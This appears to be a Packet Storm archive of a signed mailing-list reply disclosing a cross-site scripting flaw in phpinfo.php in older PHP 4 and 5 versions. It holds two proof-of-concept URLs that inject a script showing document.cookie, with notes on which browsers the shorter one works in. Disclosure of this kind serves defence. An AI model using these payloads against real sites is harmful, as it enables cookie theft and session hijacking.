Proof of concept code showing the simple syntax needed to exploit the cross site scripting vulnerability in phpinfo.php for PHP versions 4.4.0 and below and 5.0.5 and below.
df410a755e0237e3e4f3fb77b4b9b431dc74d3c5756c946f73da426fd1261a7d-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
phole@hushmail.com schrieb:
> PoC:
> phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
...or just use
phpinfo.php?[]=<script>alert(document.cookie);</script>
Saves some typing. In contrary to the above, this one only works on IE
(tested 6 on XP SP2) & Konqueror (tested 3.4.2), though.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQFDa0S+n6GkvSd/BgwRAr56AJ0aSs+7n00IdUk6HQRd+Akwe2EJIgCeOIm9
eLVPXP/uSdLOxg5/w1pB2no=
=C/qI
-----END PGP SIGNATURE-----
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed